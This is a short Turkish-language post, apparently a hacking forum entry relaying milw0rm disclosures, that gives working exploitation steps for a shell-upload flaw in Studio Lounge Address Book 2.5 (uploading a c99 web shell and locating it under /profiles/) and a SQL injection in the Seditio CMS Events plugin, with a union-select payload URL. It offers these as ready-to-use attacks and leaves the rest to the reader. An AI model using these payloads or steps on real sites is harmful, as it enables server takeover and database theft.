Seditio CMS Sql İnjection

milw0rm da bugun yayınlanmış 2 adet bug. biri sql injection biri file upload.
Studio Lounge Address Book 2.5
Address Book 2.5 (profile) Remote Shell Upload Vulnerability
bug found by Jose Luis Gongora Fernandez (a.k.a) JosS

- download: http://www.studiolounge.net/2007/08/17/address-book-25

- etkilenen dosya: upload-file.php

bu dosya yuklenen dosyanın turune onem vermiyor.

~ [EXPLOITING]

1) /index2.php?title=add (shell upload edebilirsin, mesela c99 shell)
2) Upload ettikten sonra "View Full Information"(detay sayfasına git)
(ornek: index2.php?title=fullview&id=150)
3) kaynak kodunu goreceksin "profiles/imagethumb.php?s="
(ornek: profiles/imagethumb.php?s=57b7b72739c79f02d990c4239c4169b9.php)

4) shell adresi: http://target/profiles/57b7b72739c79f02d990c4239c4169b9.php


Seditio CMS Events Plugin


Exploit

http://[site]/[path]/plug.php?e=events&f=old&c=all' [SQL]/*


sed. tablolarını bilmedigim icin bugger in verdigi sorguyu yazdım gerisi size kalmış.




ornek kullanım :plug.php?e=events&f=old&c=all' union select 1,2,3,4,5,version(),7,8,9,0,1,2,3/*